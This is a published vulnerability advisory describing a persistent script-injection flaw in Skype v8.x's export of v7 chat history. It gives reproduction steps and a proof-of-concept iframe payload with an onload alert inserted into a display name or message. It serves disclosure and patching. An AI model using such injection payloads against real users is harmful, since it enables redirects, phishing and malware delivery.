Share
Document Title:
===============
Skype v8.x - History Export v7 Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2187

Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/08/11/skype

MSRC: VULN-007910


Release Date:
=============
2019-11-22


Vulnerability Laboratory ID (VL-ID):
====================================
2187


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Script Code Injection


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Skype is a telecommunications application that specializes in providing video chat and voice calls between computers, tablets, 
mobile devices, the Xbox One console, and smartwatches via the Internet. Skype also provides instant messaging services. Users may 
transmit text, video, audio and images. Skype allows video conference calls. At the end of 2010, there were over 660 million worldwide 
users, with over 300 million estimated active each month as of August 2015. At one point in February 2012, there were 34 million 
users concurrently online on Skype.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Skype )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent vulnerability in skype v8.49.0.49 and older versions.


Vulnerability Disclosure Timeline:
==================================
2019-11-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure Program


Technical Details & Description:
================================
A persistent script code injection vulnerability has been discovered in the skype v8.49.0.49 software.

Skype has a new export function for the skype v7.x contents and messages. Users are able to export the old logs 
to generate a html file inside the browser with the exported content of the main.db file in combination with the 
journal file. The content is rendered and generated in the local installed standard browser without much usage 
of physical capacity.

In an earlier version of skype a researchers regular skype name was formated as script code payload with iframe. 
The payload was saved inside of my old v7.x profile. After the researcher noticed the newst version allows to 
export the old logs, he used his profile with the payload in the username to open the export via main.db file. 
From the main db file a html file is generated that uses the name and the username of the v7.x entries to display 
(old conversations). This name output is displayed without safe encode / parse mechanism for special chars. In the 
moment the payload becomes visible the execution takes place though the newst skype version v8.x

Skype itself dumps the conversation content from separate html files generated in the skype-export path of the 
system user account. Thus could lead as well to the manipulation of the local files that are not checking the 
validity or authority of the contents when transmitting. Also there is not check that those files are not 
manipulated at all including executable java-script code and html elements. Normally a check ensures that the 
generated files of the export function does not contain malformed executable codes. The generated files itself 
should be checked on side of the software to approve for specific manipulation attempts locally.

Finally the issue allows a remote attacker to send with skype v7.x messages as html or js script code that allows 
to transmit for example a messages export script, redirect to malicious sources, malware downloader or manipulated 
the exported messages itself. Then the attacker only waits, until the targeted user exports the file from the main.db 
and opens it unrestricted in the web-browser to execute. The same case of scenario is possible when the account is 
already updated to skype version v8.49.0.49 and older from skype v7 containing the already send message by the attacker.

The vulnerability can be exploited by remote attackers with local low user interaction of a skype user account.
The vulnerability has been tested and verified from microsoft skype v7.x up to client version v8.49.0.49. 
Exploitation of the vulnerability results in persistent manipulation of the exported html file, external malicious 
redirect, download of malicious sources, phishing attacks (messages/crdentials) or cross site scripting attacks.

Vulnerable Client(s):
[+] Skype v8.49.0.49 and older v8.x versions

Vulnerable Module(s):
[+] History Export

Affected File(s):
[+] index.html (Archived Conversations)
[+] main.db

Attacker Client(s):
[+] Skype v7.x (Creation of Profile)


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low user interaction.
For security demonstration or to reproduce the issue follow the provided information and steps below to continue. 


Manual steps to reproduce the vulnerability ... (Local PoC)
1. Open in a first step the skype 7.x version
2. Change in a second step the visible name to a test payload (script code)
Note: <a href=".[USERNAME][GENERATED FROM ARCHIVE FILE].html">>"%20[SPLIT]""><[INJECTED SCRIPT CODE PAYLOAD AS DISPLAY NAME]>%20%20 (USERNAME)</a>
3. Save the name and now upgrade to version v8.x
4. Open your skype with the upgraded installation from v7.x to the newst skype v8.x
5. Move to the settings and open the messages tab
6. Choose the History Export Function for Skype v7.x
7. Generate the file via main.db of skype
8. The standard browser opens automatically with the generated archived conversations of skype v7.x html file
9. The injected script code executes in the moment the content loads in the html template
10. Successful reproduce of the vulnerability!


Manual steps to reproduce the vulnerability ... (Remote PoC)
1. Open in a first step the skype 7.x version
2. Send a script code text message to the target test account
Note: Using a simple iframe, img with source and on element
Payload: <a href=".[USERNAME][GENERATED FROM ARCHIVE FILE].html">>"%20[SPLIT]""><[INJECTED SCRIPT CODE PAYLOAD AS DISPLAY NAME]>%20%20 (USERNAME)</a>
3. Wait until the target user account exorts the old message content locally and opens the file
Note: The malicious interaction takes place when he opens the exact malformed message-body content
4. Successful reproduce of the vulnerability!



PoC: Example
<a href=".[USERNAME][GENERATED FROM ARCHIVE FILE].html">>"%20[SPLIT]""><[INJECTED SCRIPT CODE PAYLOAD AS DISPLAY NAME]>%20%20 (USERNAME)</a>


--- Session Logs (GET) ---
https://www.vuln-lab.com/
Host: www.vuln-lab.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1


--- PoC Source (Archived Conversations 7.x - main.db - Listing)---
<!DOCTYPE html>
<html>
    <head>
        <title>Archived conversations</title>
        <meta charset="utf-8">
    </head>
<body>
    <div class="header">
        <h1 class="conversations">Archived conversations</h1>
        <ul class="exported-accounts" id="accounts">
<li class="account">
        <a href=".rm.01xindex.html">>"%20""><iframe src=https://www.vuln-lab.com onload=alert("TEST")>%20%20</iframe> (rm.01x)</a>
        </li>
        </ul>
    </body>
</html>


--- PoC Source (Archived Conversations 7.x - main.db - Conversation)---
<li class="message" id="XXXXX">
<div>
<span class="author"><iframe src=https://www.vuln-lab.com onload=alert("TEST")>%20%20</iframe>[INJECTED SCRIPT CODE TEST PAYLOAD!]</span>
<span class="timestamp">11.7.2018 15:27:57</span>
</div>
<div class="message-body"><div class="uri-object">This is a Skype Archive Conversation Message of main.db ;)</div></div>
</li>
<li class="message" id="XXXXX" >
<div>
<span class="author"><iframe src=https://www.vuln-lab.com onload=alert("TEST")>%20%20</iframe>[INJECTED SCRIPT CODE TEST PAYLOAD!]</span>
<span class="timestamp">11.7.2018 15:28:11</span>
</div>
<div class="message-body">kommt anscheinend durch somhow</div>
</li></ul>
</body>
</html>
</iframe></div></div></li>


Solution - Fix & Patch:
=======================
The vulnerability can be resolved by escaping the output location with the name, author & message-body 
variables correctly to prevent malicious script code execution attacks like cross site scripting, extern 
redirect, download of malware from external sources or persistent manipulation of the affected 
export html module.

Note: Upgrade to skype v8.54.0.91 to resolve the issue permanently. The creation of v7 profiles 
via client is not anymore possible.
An alternative way would be to delete your local old v7 profile files that can still be imported to ensure.


Security Risk:
==============
The security risk of the persistent script code injection web vulnerability is estimated as medium. The exploitation is 
limited to group/multi-user accounts and specific requirements as conditions to successfully exploit.


Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or 
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™